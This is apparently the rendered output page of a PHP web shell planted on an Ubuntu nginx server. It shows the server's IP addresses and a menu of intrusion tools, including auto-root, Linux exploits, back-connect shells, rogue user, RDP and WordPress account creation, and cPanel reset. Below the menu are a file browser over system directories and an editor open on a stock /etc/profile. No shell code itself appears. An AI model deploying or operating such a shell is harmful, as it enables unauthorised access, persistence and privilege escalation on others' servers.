Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core24 /
1196 /
usr /
share /
[ HOME SHELL ]
Name
Size
Permission
Action
applications
[ DIR ]
drwxr-xr-x
base-files
[ DIR ]
drwxr-xr-x
base-passwd
[ DIR ]
drwxr-xr-x
bash-completion
[ DIR ]
drwxr-xr-x
binfmts
[ DIR ]
drwxr-xr-x
ca-certificates
[ DIR ]
drwxr-xr-x
common-licenses
[ DIR ]
drwxr-xr-x
dbus-1
[ DIR ]
drwxr-xr-x
debhelper
[ DIR ]
drwxr-xr-x
debianutils
[ DIR ]
drwxr-xr-x
dhcpcd
[ DIR ]
drwxr-xr-x
dict
[ DIR ]
drwxr-xr-x
distro-info
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
finalrd
[ DIR ]
drwxr-xr-x
fontconfig
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
gcc
[ DIR ]
drwxr-xr-x
glib-2.0
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
initramfs-tools
[ DIR ]
drwxr-xr-x
iptables
[ DIR ]
drwxr-xr-x
keyrings
[ DIR ]
drwxr-xr-x
libc-bin
[ DIR ]
drwxr-xr-x
libdrm
[ DIR ]
drwxr-xr-x
libgcrypt20
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
man
[ DIR ]
drwxr-xr-x
menu
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
netplan
[ DIR ]
drwxr-xr-x
opensc
[ DIR ]
drwxr-xr-x
openssh
[ DIR ]
drwxr-xr-x
p11-kit
[ DIR ]
drwxr-xr-x
pam
[ DIR ]
drwxr-xr-x
pam-configs
[ DIR ]
drwxr-xr-x
pixmaps
[ DIR ]
drwxr-xr-x
pkgconfig
[ DIR ]
drwxr-xr-x
plymouth
[ DIR ]
drwxr-xr-x
polkit-1
[ DIR ]
drwxr-xr-x
python3
[ DIR ]
drwxr-xr-x
readline
[ DIR ]
drwxr-xr-x
secureboot
[ DIR ]
drwxr-xr-x
sensible-utils
[ DIR ]
drwxr-xr-x
sgml
[ DIR ]
drwxr-xr-x
sgml-base
[ DIR ]
drwxr-xr-x
snappy
[ DIR ]
drwxr-xr-x
subiquity
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
tabset
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
ucf
[ DIR ]
drwxr-xr-x
util-linux
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
xml
[ DIR ]
drwxr-xr-x
xml-core
[ DIR ]
drwxr-xr-x
zoneinfo
[ DIR ]
drwxr-xr-x
dot.bashrc
3.03
KB
-rw-r--r--
dot.profile
161
B
-rw-r--r--
dot.profile.md5sums
72
B
-rw-r--r--
motd
284
B
-rw-r--r--
networks
91
B
-rw-r--r--
profile
582
B
-rw-r--r--
profile.md5sums
396
B
-rw-r--r--
staff-group-for-usr-local
772
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells (bash(1), ksh(1), ash(1), ...). if [ "${PS1-}" ]; then if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then # The file bash.bashrc already sets the default PS1. # PS1='\h:\w\$ ' if [ -f /etc/bash.bashrc ]; then . /etc/bash.bashrc fi else if [ "$(id -u)" -eq 0 ]; then PS1='# ' else PS1='$ ' fi fi fi if [ -d /etc/profile.d ]; then for i in /etc/profile.d/*.sh; do if [ -r $i ]; then . $i fi done unset i fi
Close